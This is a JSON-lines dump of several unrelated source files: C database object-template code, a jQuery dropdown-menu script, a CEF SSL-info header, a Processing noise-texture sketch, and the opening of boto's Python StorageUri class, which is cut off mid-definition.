*/\n if (template_ptr->uniques_were_modified)\n\t{\n\t *has_uniques = 1;\n\t}\n\n /* this template looks ok, recursively go through the sub templates */\n for (i = 0; i < template_ptr->nassigns && error == NO_ERROR; i++)\n\t{\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t {\n\t continue;\n\t }\n\t if (a->obj != NULL)\n\t {\n\t /* the non-null flag is only used for the outermost template */\n\t error = obt_final_check (a->obj, 1, has_uniques);\n\t }\n\t else\n\t {\n\t DB_TYPE av_type;\n\n\t av_type = DB_VALUE_TYPE (a->variable);\n\t if (TP_IS_SET_TYPE (av_type))\n\t\t{\n\t\t error = obt_final_check_set (db_get_set (a->variable), has_uniques);\n\t\t}\n\t }\n\t}\n\n /* check unique_constraints, but only if not disabled */\n /*\n * test & set interface doesn't work right now, full savepoints are instead\n * being performed in obt_update_internal.\n */\n }\n return (error);\n}\n\n/*\n * obt_apply_assignment - This is used to apply the assignments in an object\n * template after all of the appropriate semantic\n * checking has taken place.\n * return: error code\n * op(in): class or instance pointer\n * att(in): attribute descriptor\n * mem(in): instance memory pointer (instance attribute only)\n * value(in): value to assign\n * check_uniques(in):\n *\n * Note:\n * This used to be a lot more complicated because the translation\n * of virtual values to base values was deferred until this step.\n * Now, the values are translated immediately when they are added\n * to the template.\n */\n\nstatic int\nobt_apply_assignment (MOP op, SM_ATTRIBUTE * att, char *mem, DB_VALUE * value, int check_uniques)\n{\n int error = NO_ERROR;\n\n if (!TP_IS_SET_TYPE (TP_DOMAIN_TYPE (att->domain)))\n {\n error = obj_assign_value (op, att, mem, value);\n }\n else\n {\n /* for sets, first apply any templates in the set */\n error = obt_convert_set_templates (db_get_set (value), check_uniques);\n if (error == NO_ERROR)\n\t{\n\n\t /* BE VERY CAREFUL HERE, IN THE OLD VERSION THE SET WAS BEING COPIED ? */\n\t error = obj_assign_value (op, att, mem, value);\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_apply_assignments -\n * return: error code\n * template(in): object template\n * check_uniques(in): true iff check unique constraints\n * level(in): level of recursion (0 for outermost call)\n *\n * Note:\n * This is used to apply the assignments in an object template after all\n * of the appropriate semantic checking has taken place. Technically,\n * there shouldn't be any errors here. If errors do occurr, they will\n * not cause a rollback of any partially applied assignments. The only\n * place this is likely to happen is if there are problems updating\n * the unique constraint table but even this would represent a serious\n * internal error that may have other consequences as well.\n * Update triggers on the individual instances are fired here.\n * If level==0 then do lazy flushing of proxy objects. If level > 0 then\n * do eager flushing of proxy objects because it's a nested proxy insert.\n */\n\nstatic int\nobt_apply_assignments (OBJ_TEMPLATE * template_ptr, int check_uniques, int level)\n{\n int error = NO_ERROR;\n OBJ_TEMPASSIGN *a;\n DB_VALUE val;\n int pin, trigstate;\n TR_STATE *trstate;\n DB_OBJECT *temp;\n DB_TRIGGER_EVENT event;\n SM_CLASS *class_;\n DB_OBJECT *object = NULL;\n MOBJ mobj = NULL;\n char *mem;\n int i;\n\n /* have we already been here ? 
*/\n if (template_ptr->traversal == obj_Template_traversal)\n {\n return NO_ERROR;\n }\n template_ptr->traversal = obj_Template_traversal;\n\n /* make sure we have a good template */\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n /* perform all operations on the base class */\n class_ = OBT_BASE_CLASS (template_ptr);\n\n /*\n * figure out what kind of triggers to fire here, only do this\n * if the class indicates that there are active triggers\n */\n trigstate = sm_active_triggers (OBT_BASE_CLASSOBJ (template_ptr), class_, TR_EVENT_ALL);\n if (trigstate < 0)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n event = TR_EVENT_NULL;\n if (trigstate)\n {\n if (template_ptr->object == NULL)\n\t{\n\t event = TR_EVENT_INSERT;\n\t}\n else\n\t{\n\t event = TR_EVENT_UPDATE;\n\t}\n }\n\n /* Collect triggers */\n trstate = NULL;\n temp = NULL;\n if (event != TR_EVENT_NULL)\n {\n if (tr_prepare_class (&trstate, class_->triggers, OBT_BASE_CLASSOBJ (template_ptr), event))\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t return er_errid ();\n\t}\n if (event == TR_EVENT_UPDATE)\n\t{\n\t for (i = 0; i < template_ptr->nassigns; i++)\n\t {\n\t a = template_ptr->assignments[i];\n\t if (a == NULL)\n\t\t{\n\t\t continue;\n\t\t}\n\t if (tr_prepare_class (&trstate, a->att->triggers, OBT_BASE_CLASSOBJ (template_ptr), event))\n\t\t{\n\t\t tr_abort (trstate);\n\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t}\n\t }\n\t}\n }\n\n /* Evaluate BEFORE triggers */\n pin = -1;\n if (trstate == NULL)\n {\n /* no triggers, lock/create the object */\n error = access_object (template_ptr, &object, &mobj);\n if (error == NO_ERROR)\n\t{\n\t pin = ws_pin (object, 1);\n\t}\n }\n else\n {\n /* make the temporary object for the template */\n temp = make_temp_object (OBT_BASE_CLASSOBJ (template_ptr), template_ptr);\n if (temp == NULL)\n\t{\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t}\n else\n\t{\n\t if (event == TR_EVENT_INSERT)\n\t {\n\t /* evaluate triggers before creating the object */\n\t if (!(error = tr_before_object (trstate, NULL, temp)))\n\t\t{\n\t\t /* create the new object */\n\t\t if (!(error = access_object (template_ptr, &object, &mobj)))\n\t\t {\n\t\t pin = ws_pin (object, 1);\n\t\t }\n\t\t}\n\t else\n\t\ttrstate = NULL;\n\t }\n\t else\n\t {\n\t /* lock the object first, then evaluate the triggers */\n\t if (!(error = access_object (template_ptr, &object, &mobj)))\n\t\t{\n\t\t if ((error = tr_before_object (trstate, object, temp)))\n\t\t {\n\t\t trstate = NULL;\n\t\t }\n\t\t}\n\n\t /* in some cases, the object has been decached in before trigger. we need fetch it again. 
*/\n\t if (error == NO_ERROR && object->decached)\n\t\t{\n\t\t error = au_fetch_instance_force (object, &mobj, AU_FETCH_UPDATE, LC_FETCH_MVCC_VERSION);\n\t\t if (error != NO_ERROR)\n\t\t {\n\t\t if (trstate != NULL)\n\t\t\t{\n\t\t\t tr_abort (trstate);\n\t\t\t}\n\t\t if (temp != NULL)\n\t\t\t{\n\t\t\t free_temp_object (temp);\n\t\t\t}\n\n\t\t if (WS_IS_DELETED (object))\n\t\t\t{\n\t\t\t return NO_ERROR;\n\t\t\t}\n\n\t\t return error;\n\t\t }\n\t\t}\n\t /* set pin after before trigger */\n\t pin = ws_pin (object, 1);\n\t }\n\t}\n }\n\n /* Apply the assignments */\n for (i = 0; i < template_ptr->nassigns && error == NO_ERROR; i++)\n {\n a = template_ptr->assignments[i];\n if (a == NULL)\n\tcontinue;\n\n /* find memory pointer if this is an instance attribute */\n mem = NULL;\n if (a->att->header.name_space == ID_ATTRIBUTE && mobj != NULL)\n\t{\n\t mem = (char *) mobj + a->att->offset;\n\t}\n\n /* save old value for AFTER triggers */\n if (trstate != NULL && trstate->triggers != NULL && event == TR_EVENT_UPDATE)\n\t{\n\t a->old_value = pr_make_ext_value ();\n\t if (a->old_value == NULL)\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t }\n\t else\n\t {\n\t /*\n\t * this will copy the value which is unfortunate since\n\t * we're just going to throw it away later\n\t */\n\t error = obj_get_value (object, a->att, mem, NULL, a->old_value);\n\t }\n\t}\n\n /*\n * The following code block is for handling LOB type.\n * If the client is the log applier, it doesn't care LOB type.\n */\n if (db_get_client_type () != DB_CLIENT_TYPE_LOG_APPLIER)\n\t{\n\n\t if (a->att->type->id == DB_TYPE_BLOB || a->att->type->id == DB_TYPE_CLOB)\n\t {\n\t DB_VALUE old;\n\t DB_TYPE value_type;\n\n\t db_value_domain_init (&old, a->att->type->id, DB_DEFAULT_PRECISION, DB_DEFAULT_SCALE);\n\t error = obj_get_value (object, a->att, mem, NULL, &old);\n\t if (error == NO_ERROR && !db_value_is_null (&old))\n\t\t{\n\t\t DB_ELO *elo;\n\n\t\t value_type = db_value_type (&old);\n\t\t assert (value_type == DB_TYPE_BLOB || value_type == DB_TYPE_CLOB);\n\t\t elo = db_get_elo (&old);\n\t\t if (elo)\n\t\t {\n\t\t error = db_elo_delete (elo);\n\t\t }\n\t\t db_value_clear (&old);\n\t\t error = (error >= 0 ? NO_ERROR : error);\n\t\t}\n\t if (error == NO_ERROR && !db_value_is_null (a->variable))\n\t\t{\n\t\t DB_ELO dest_elo, *elo_p;\n\t\t char *save_meta_data;\n\n\t\t value_type = db_value_type (a->variable);\n\t\t assert (value_type == DB_TYPE_BLOB || value_type == DB_TYPE_CLOB);\n\t\t elo_p = db_get_elo (a->variable);\n\n\t\t assert (sm_ch_name ((MOBJ) class_) != NULL);\n\t\t save_meta_data = elo_p->meta_data;\n\t\t elo_p->meta_data = (char *) sm_ch_name ((MOBJ) class_);\n\t\t error = db_elo_copy (db_get_elo (a->variable), &dest_elo);\n\t\t elo_p->meta_data = save_meta_data;\n\n\t\t error = (error >= 0 ? 
NO_ERROR : error);\n\t\t if (error == NO_ERROR)\n\t\t {\n\t\t db_value_clear (a->variable);\n\t\t db_make_elo (a->variable, value_type, &dest_elo);\n\t\t (a->variable)->need_clear = true;\n\t\t }\n\t\t}\n\t }\t\t\t/* if (a->att->type->id == DB_TYPE_BLOB) || */\n\t}\t\t\t/* if (db_get_client_type () != */\n\n if (error == NO_ERROR)\n\t{\n\t /* check for template assignment that needs to be expanded */\n\t if (a->obj != NULL)\n\t {\n\t /* this is a template assignment, recurse on this template */\n\t error = obt_apply_assignments (a->obj, check_uniques, level + 1);\n\t if (error == NO_ERROR)\n\t\t{\n\t\t db_make_object (&val, a->obj->object);\n\t\t error = obt_apply_assignment (object, a->att, mem, &val, check_uniques);\n\t\t}\n\t }\n\t else\n\t {\n\t /* non-template assignment */\n\t error = obt_apply_assignment (object, a->att, mem, a->variable, check_uniques);\n\t }\n\t}\n }\n\n if ((error == NO_ERROR) && (object != NULL))\n {\n ws_dirty (object);\n }\n\n /* if we updated any shared attributes, we need to mark the class dirty */\n if (template_ptr->shared_was_modified)\n {\n ws_dirty (OBT_BASE_CLASSOBJ (template_ptr));\n }\n\n /* unpin the object */\n if (pin != -1)\n {\n (void) ws_pin (object, pin);\n }\n\n /* run after triggers */\n if (trstate != NULL)\n {\n if (error)\n\t{\n\t tr_abort (trstate);\n\t}\n else\n\t{\n\t if (event == TR_EVENT_INSERT)\n\t {\n\t error = tr_after_object (trstate, object, NULL);\n\t }\n\t else\n\t {\n\t /* mark the template as an \"old\" object */\n\t template_ptr->is_old_template = 1;\n\t error = tr_after_object (trstate, object, temp);\n\t }\n\t}\n }\n\n if (temp != NULL)\n {\n /* free this after both before and after triggers have run */\n free_temp_object (temp);\n }\n\n /*\n * If this is a virtual instance, we used to flush it back to the server\n * at this point. But that early flushing is too expensive. Consider, for\n * example, that all db_template-based proxy inserts go thru this code and\n * experience a 25-30 fold performance slowdown. Therefore, we delay\n * flushing dirty proxy mops for non-nested proxy inserts. It's not clear\n * under what conditions we can safely delay flushing of nested proxy\n * inserts, so we don't.\n */\n if (level > 0 && error == NO_ERROR && object && object->is_vid && vid_is_base_instance (object))\n {\n error = vid_flush_and_rehash (object);\n }\n else if (error != NO_ERROR && object && object->is_vid && vid_is_base_instance (object))\n {\n /*\n * if an error occurred in a nested proxy insert such as this\n * insert into c_h_employee values ('new_e', 123456789,\n * (insert into c_h_department (dept_no) values (11)),NULL)\n * we must decache the outer proxy object, otherwise a later flush\n * will generate incorrect results. 
Note that vid_flush_and_rehash\n * already decaches any offending inner nested proxy inserts.\n */\n ws_decache (object);\n }\n\n /*\n * check for unique constraint violations.\n * if the object has uniques and this is an insert, we must\n * flush the object to ensure that the btrees for the uniques\n * are updated correctly.\n * NOTE: Performed for updates now too since test & set doesn't work.\n */\n if (error == NO_ERROR)\n {\n if ((check_uniques && template_ptr->uniques_were_modified) || template_ptr->fkeys_were_modified\n\t || template_ptr->function_key_modified || template_ptr->force_flush\n\t || (template_ptr->check_serializable_conflict && template_ptr->object\n\t && !OID_ISTEMP (&(template_ptr->object->oid_info.oid))))\n\t{\n\t if ((locator_flush_class (OBT_BASE_CLASSOBJ (template_ptr)) != NO_ERROR)\n\t || (locator_flush_instance (OBT_BASE_OBJECT (template_ptr)) != NO_ERROR))\n\t {\n\t assert (er_errid () != NO_ERROR);\n\t error = er_errid ();\n\t }\n\t /* update template object if this was a partitioned class */\n\t object = OBT_BASE_OBJECT (template_ptr);\n\t}\n }\n\n return error;\n}\n\n/*\n * obt_set_label - This is called by the interpreter when a certain template\n * is referenced by a interpreter variable (label).\n * return: none\n * template(in): object template\n * label(in): pointer to MOP pointer\n *\n * Note :\n * In this case, when the template is converted into a MOP, the pointer\n * supplied is also set to the value of this mop.\n *\n */\n\nvoid\nobt_set_label (OBJ_TEMPLATE * template_ptr, DB_VALUE * label)\n{\n template_ptr->label = label;\n}\n\n/*\n * obt_disable_unique_checking\n * return: none\n * template(in): object template\n *\n * Note :\n * This is called by the interpreter when doing a bulk update to disable\n * unique constraint checking on a per instance basis. 
It is the\n * interpreter's responsibility to check for constraints.\n *\n */\n\nvoid\nobt_disable_unique_checking (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr)\n {\n template_ptr->check_uniques = 0;\n }\n}\n\n/*\n * obt_disable_serializable_conflict_checking : disable SERIALIZABLE conflicts\n *\t\t\t\t\t checking\n * return: none\n * template(in): object template\n */\nvoid\nobt_disable_serializable_conflict_checking (OBJ_TEMPLATE * template_ptr)\n{\n if (template_ptr)\n {\n template_ptr->check_serializable_conflict = 0;\n }\n}\n\n/*\n * obt_enable_unique_checking - This is used by the loader to disable unique\n * constraint checking for all templates created.\n * When templates are created this state is\n * incorporated in the template, see make_template()\n * return: The previous state is returned.\n * TRUE : global unique checking is enabled.\n * FALSE : global unique checking is disabled.\n * new_state(in):\n *\n */\nbool\nobt_enable_unique_checking (bool new_state)\n{\n bool old_state = obt_Check_uniques;\n\n obt_Check_uniques = new_state;\n return (old_state);\n}\n\n/*\n * obj_set_force_flush - set force_flush flag of the template\n *\n * return : void\n * template_ptr (in/out)\n */\nvoid\nobt_set_force_flush (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->force_flush = 1;\n}\n\n/*\n * obj_reset_force_flush - reset force_flush flag of the template\n *\n * return : void\n * template_ptr (in/out)\n */\nvoid\nobt_reset_force_flush (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->force_flush = 0;\n}\n\n/*\n * obt_retain_after_finish\n * return: none\n * template(in):\n *\n */\nvoid\nobt_retain_after_finish (OBJ_TEMPLATE * template_ptr)\n{\n assert (template_ptr != NULL);\n\n template_ptr->discard_on_finish = 0;\n}\n\n/*\n * obt_update_internal\n * return: error code\n * template(in): object template\n * newobj(in): return pointer to mop of new instance\n * check_non_null(in): set if this is an internally defined template\n *\n */\nint\nobt_update_internal (OBJ_TEMPLATE * template_ptr, MOP * newobj, int check_non_null)\n{\n int error = NO_ERROR;\n char savepoint_name[80];\n int has_uniques = 0;\n int savepoint_used = 0;\n\n if (template_ptr != NULL)\n {\n error = validate_template (template_ptr);\n if (error == NO_ERROR)\n\t{\n\t /* allocate a new traversal counter for the check pass */\n\t begin_template_traversal ();\n\t error = obt_final_check (template_ptr, check_non_null, &has_uniques);\n\t if (error == NO_ERROR)\n\t {\n\n\t if (db_get_client_type () == DB_CLIENT_TYPE_LOG_APPLIER)\n\t\t{\n\t\t /*\n\t\t * Only one of the log_applier can apply replication\n\t\t * logs at the same time.\n\t\t * Therefore, log_applier don't need to perform\n\t\t * savepoint at this time to maintain unique indexes.\n\t\t */\n\n\t\t /* do nothing */\n\t\t ;\n\t\t}\n\t else if ((template_ptr->check_uniques && has_uniques) || template_ptr->fkeys_were_modified\n\t\t || template_ptr->function_key_modified || template_ptr->force_flush)\n\t\t{\n\t\t /* Must perform savepoint to handle unique maintenance until the time when test & set will work\n\t\t * correctly. We must do a savepoint if this template or any sub template has uniques. The actual\n\t\t * unique tests will be done in obt_apply_assignments(). 
*/\n\n\t\t sprintf (savepoint_name, \"%s-%d\", OBJ_INTERNAL_SAVEPOINT_NAME, template_savepoint_count++);\n\t\t if (tran_system_savepoint (savepoint_name) != NO_ERROR)\n\t\t {\n\t\t assert (er_errid () != NO_ERROR);\n\t\t return er_errid ();\n\t\t }\n\t\t savepoint_used = 1;\n\t\t}\n\n\t /* allocate another traversal counter for the assignment pass */\n\t begin_template_traversal ();\n\t error = obt_apply_assignments (template_ptr, template_ptr->check_uniques, 0);\n\t if (error == NO_ERROR)\n\t\t{\n\t\t if (newobj != NULL)\n\t\t {\n\t\t *newobj = template_ptr->object;\n\t\t }\n\n\t\t /* When discard_on_finish is false, caller should explictly free template */\n\t\t if (template_ptr->discard_on_finish)\n\t\t {\n\t\t obt_free_template (template_ptr);\n\t\t }\n\t\t}\n\t }\n\t}\n }\n\n /*\n * do we need to rollback due to failure? We don't rollback if the\n * trans has already been aborted.\n */\n if (error != NO_ERROR && savepoint_used && error != ER_LK_UNILATERALLY_ABORTED)\n {\n (void) tran_abort_upto_system_savepoint (savepoint_name);\n }\n\n return error;\n}\n\n/*\n * Don't change the external interface to allow setting the check_non_null\n * flag.\n */\n/*\n * obt_update - This will take an object template and apply all of\n * the assignments, creating new objects as necessary\n * return: error code\n * template(in): object template\n * newobj(in): return pointer to mop of new instance\n *\n * Note:\n * If the top level template is for a new object, the mop will be returned\n * through the \"newobj\" parameter.\n * Note that the template will be freed here if successful\n * so the caller must not asusme that it can be reused.\n * The check_non_null flag is set in the case where the template\n * is being created in response to the obj_create() function which\n * implements the db_create() and db_create_by_name API functions.\n * Unfortunately, as the functions are defined, there is no way\n * to supply initial values. If the class has attributes that are\n * defined with the NON NULL constraint, the usual template processing\n * refuses to create the object until the missing values\n * are supplied. This means that it is impossible for the \"atomic\"\n * functions like db_create() to make an object whose attributes\n * have the constraint. This is arguably the correct behavior but\n * it hoses 4GE since it isn't currently prepared to go check for\n * creation dependencies and use full templates instead.\n */\nint\nobt_update (OBJ_TEMPLATE * template_ptr, MOP * newobj)\n{\n return obt_update_internal (template_ptr, newobj, 1);\n}\n\n/*\n * make_temp_object - This is used to create a temporary object for use\n * in trigger processing.\n * return: temporary object MOP\n * class(in):\n * object(in): object template with values\n *\n */\nstatic MOP\nmake_temp_object (DB_OBJECT * class_, OBJ_TEMPLATE * object)\n{\n MOP obj = NULL;\n\n if (class_ == NULL || object == NULL)\n {\n er_set (ER_ERROR_SEVERITY, ARG_FILE_LINE, ER_OBJ_INVALID_TEMP_OBJECT, 0);\n }\n else\n {\n obj = ws_make_temp_mop ();\n if (obj != NULL)\n\t{\n\t obj->class_mop = class_;\n\t obj->object = (void *) object;\n\t obj->pruning_type = object->pruning_type;\n\t /*\n\t * We have to be very careful here - we need to mimick the old oid\n\t * for \"old\" to behave correctly.\n\t */\n\t if (object->object)\n\t {\n\t obj->oid_info.oid = object->object->oid_info.oid;\n\t }\n\t}\n }\n\n return obj;\n}\n\n/*\n * free_temp_object - This frees the temporary object created by\n * make_temp_object. 
It does NOT free the template,\n * only the MOP.\n * return: none\n * obj(in): temporary object\n *\n */\nstatic void\nfree_temp_object (MOP obj)\n{\n if (obj != NULL)\n {\n obj->class_mop = NULL;\n obj->object = NULL;\n ws_free_temp_mop (obj);\n }\n}\n\n/*\n * obt_populate_known_arguments - Populate default and auto_increment\n *\t\t\t\t arguments of template_ptr\n * return: error code if unsuccessful\n *\n * template_ptr(in): temporary object\n *\n * Note :\n * This is necessary for INSERT templates. The assignments are marked\n * so that if an assignment is later made to the template with the\n * same name, we don't generate an error because its ok to override\n * a default value or an auto_increment value.\n * If an assignment is already found with the name, it is assumed\n * that an initial value has already been given and the default or\n * auto_increment value is ignored.\n *\n */\nint\nobt_populate_known_arguments (OBJ_TEMPLATE * template_ptr)\n{\n if (validate_template (template_ptr))\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (template_ptr->is_class_update)\n {\n return NO_ERROR;\n }\n\n if (populate_defaults (template_ptr) != NO_ERROR)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n if (obt_Enable_autoincrement != true)\n {\n return NO_ERROR;\n }\n\n if (populate_auto_increment (template_ptr) != NO_ERROR)\n {\n assert (er_errid () != NO_ERROR);\n return er_errid ();\n }\n\n return NO_ERROR;\n}\n\n/*\n * obt_begin_insert_values -\n *\n * return: none\n *\n */\nvoid\nobt_begin_insert_values (void)\n{\n obt_Last_insert_id_generated = false;\n}\n"} {"text": "// Browse menu dropdown\n\nvar $ = require('jquery')\n\n/**\n * Show or hide the browse menus. If no `menu` parameter is provided, then\n * this shows\n * @param {jQuery=} menu to show/hide\n * @param {boolean=} toggle force the menu open?\n */\nfunction toggleBrowseMenu (menu, toggle) {\n if (toggle == null) toggle = !menu.$browse.hasClass('on')\n\n menu.$btn.toggleClass('on', toggle)\n menu.$browse.toggleClass('on', toggle)\n\n // Update chevron icon\n var icon = menu.$btn.find('i')\n if (toggle) {\n icon\n .removeClass('icon-down-open')\n .addClass('icon-up-open')\n } else {\n icon\n .addClass('icon-down-open')\n .removeClass('icon-up-open')\n }\n}\n\nvar browseMenus = []\nwindow.closeBrowseMenus = function () {\n browseMenus.forEach(function (menu) {\n toggleBrowseMenu(menu, false)\n })\n}\n\n// Get all the browse menus in the page\n$('.browse').each(function (i, elem) {\n var $elem = $(elem)\n var name = /browse-(\\w+)/.exec($elem.attr('class'))\n if (name) {\n name = name[1]\n var menu = {\n name: name,\n $btn: $('.header .' + name),\n $browse: $elem,\n btnHover: false,\n browseHover: false\n }\n\n var maybeOpenClose = function () {\n if (menu.btnHover || menu.browseHover) {\n // Only show on larger screens\n if (window.StudyNotes.isMobile) return\n toggleBrowseMenu(menu, true)\n } else if (!menu.btnHover || !menu.browseHover) {\n toggleBrowseMenu(menu, false)\n }\n }\n\n menu.$btn.hover(function () {\n menu.btnHover = true\n maybeOpenClose()\n }, function () {\n menu.btnHover = false\n maybeOpenClose()\n })\n menu.$browse.hover(function () {\n menu.browseHover = true\n maybeOpenClose()\n }, function () {\n menu.browseHover = false\n maybeOpenClose()\n })\n\n browseMenus.push(menu)\n }\n})\n\n// Close browse menu on search focus\n$('.header .search').on('focusin', function () {\n window.closeBrowseMenus()\n})\n"} {"text": "// Copyright (c) 2017 Marshall A. Greenblatt. 
All rights reserved.\n//\n// Redistribution and use in source and binary forms, with or without\n// modification, are permitted provided that the following conditions are\n// met:\n//\n// * Redistributions of source code must retain the above copyright\n// notice, this list of conditions and the following disclaimer.\n// * Redistributions in binary form must reproduce the above\n// copyright notice, this list of conditions and the following disclaimer\n// in the documentation and/or other materials provided with the\n// distribution.\n// * Neither the name of Google Inc. nor the name Chromium Embedded\n// Framework nor the names of its contributors may be used to endorse\n// or promote products derived from this software without specific prior\n// written permission.\n//\n// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n// \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\n// A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\n// OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\n// SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n// LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\n// DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\n// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n// (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n// OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n//\n// ---------------------------------------------------------------------------\n//\n// This file was generated by the CEF translator tool and should not edited\n// by hand. See the translator.README.txt file in the tools directory for\n// more information.\n//\n\n#ifndef CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n#define CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n#pragma once\n\n#include \"include/capi/cef_base_capi.h\"\n#include \"include/capi/cef_values_capi.h\"\n#include \"include/capi/cef_x509_certificate_capi.h\"\n\n#ifdef __cplusplus\nextern \"C\" {\n#endif\n\n\n///\n// Structure representing SSL information.\n///\ntypedef struct _cef_sslinfo_t {\n ///\n // Base structure.\n ///\n cef_base_ref_counted_t base;\n\n ///\n // Returns a bitmask containing any and all problems verifying the server\n // certificate.\n ///\n cef_cert_status_t (CEF_CALLBACK *get_cert_status)(\n struct _cef_sslinfo_t* self);\n\n ///\n // Returns the X.509 certificate.\n ///\n struct _cef_x509certificate_t* (CEF_CALLBACK *get_x509certificate)(\n struct _cef_sslinfo_t* self);\n} cef_sslinfo_t;\n\n\n///\n// Returns true (1) if the certificate status has any error, major or minor.\n///\nCEF_EXPORT int cef_is_cert_status_error(cef_cert_status_t status);\n\n///\n// Returns true (1) if the certificate status represents only minor errors (e.g.\n// failure to verify certificate revocation).\n///\nCEF_EXPORT int cef_is_cert_status_minor_error(cef_cert_status_t status);\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif // CEF_INCLUDE_CAPI_CEF_SSL_INFO_CAPI_H_\n"} {"text": "// M_1_3_02.pde\n// \n// Generative Gestaltung, ISBN: 978-3-87439-759-9\n// First Edition, Hermann Schmidt, Mainz, 2009\n// Hartmut Bohnacker, Benedikt Gross, Julia Laub, Claudius Lazzeroni\n// Copyright 2009 Hartmut Bohnacker, Benedikt Gross, Julia Laub, Claudius Lazzeroni\n//\n// http://www.generative-gestaltung.de\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use 
this file except in compliance with the License.\n// You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\n/**\n * creates a texture based on random values\n * \n * MOUSE\n * click : new noise line\n * \n * KEYS\n * s : save png\n */\n\nimport java.util.Calendar;\n\nint actRandomSeed = 0;\n\nvoid setup() {\n size(512,512); \n}\n\nvoid draw() {\n background(0);\n\n randomSeed(actRandomSeed);\n \n loadPixels();\n for (int x = 0; x < width; x++) {\n for (int y = 0; y < height; y++) {\n float randomValue = random(255);\n pixels[x+y*width] = color(randomValue);\n }\n }\n updatePixels();\n}\n\nvoid mouseReleased() {\n actRandomSeed = (int) random(100000);\n}\n\nvoid keyReleased() { \n if (key == 's' || key == 'S') saveFrame(timestamp()+\"_####.png\");\n}\n\nString timestamp() {\n Calendar now = Calendar.getInstance();\n return String.format(\"%1$ty%1$tm%1$td_%1$tH%1$tM%1$tS\", now);\n}\n\n\n\n\n\n\n\n\n\n\n\n"} {"text": "# Copyright 2010 Google Inc.\n# Copyright (c) 2011, Nexenta Systems Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a\n# copy of this software and associated documentation files (the\n# \"Software\"), to deal in the Software without restriction, including\n# without limitation the rights to use, copy, modify, merge, publish, dis-\n# tribute, sublicense, and/or sell copies of the Software, and to permit\n# persons to whom the Software is furnished to do so, subject to the fol-\n# lowing conditions:\n#\n# The above copyright notice and this permission notice shall be included\n# in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS\n# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-\n# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT\n# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,\n# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\n# IN THE SOFTWARE.\n\nimport boto\nimport os\nimport sys\nimport textwrap\nfrom boto.s3.deletemarker import DeleteMarker\nfrom boto.exception import BotoClientError\nfrom boto.exception import InvalidUriError\n\n\nclass StorageUri(object):\n \"\"\"\n Base class for representing storage provider-independent bucket and\n object name with a shorthand URI-like syntax.\n\n This is an abstract class: the constructor cannot be called (throws an\n exception if you try).\n \"\"\"\n\n connection = None\n # Optional args that can be set from one of the concrete subclass\n # constructors, to change connection behavior (e.g., to override\n # https_connection_factory).\n connection_args = None\n\n # Map of provider scheme ('s3' or 'gs') to AWSAuthConnection object. 
We\n # maintain a pool here in addition to the connection pool implemented\n # in AWSAuthConnection because the latter re-creates its connection pool\n # every time that class is instantiated (so the current pool is used to\n # avoid re-instantiating AWSAuthConnection).\n provider_pool = {}\n\n def __init__(self):\n \"\"\"Uncallable constructor on abstract base StorageUri class.\n \"\"\"\n raise BotoClientError('Attempt to instantiate abstract StorageUri '\n 'class')\n\n def __repr__(self):\n \"\"\"Returns string representation of URI.\"\"\"\n return self.uri\n\n def equals(self, uri):\n \"\"\"Returns true if two URIs are equal.\"\"\"\n return self.uri == uri.uri\n\n def check_response(self, resp, level, uri):\n if resp is None:\n raise InvalidUriError('\\n'.join(textwrap.wrap(\n 'Attempt to get %s for \"%s\" failed. This can happen if '\n 'the URI refers to a non-existent object or if you meant to '\n 'operate on a directory (e.g., leaving off -R option on gsutil '\n 'cp, mv, or ls of a bucket)' % (level, uri), 80)))\n\n def 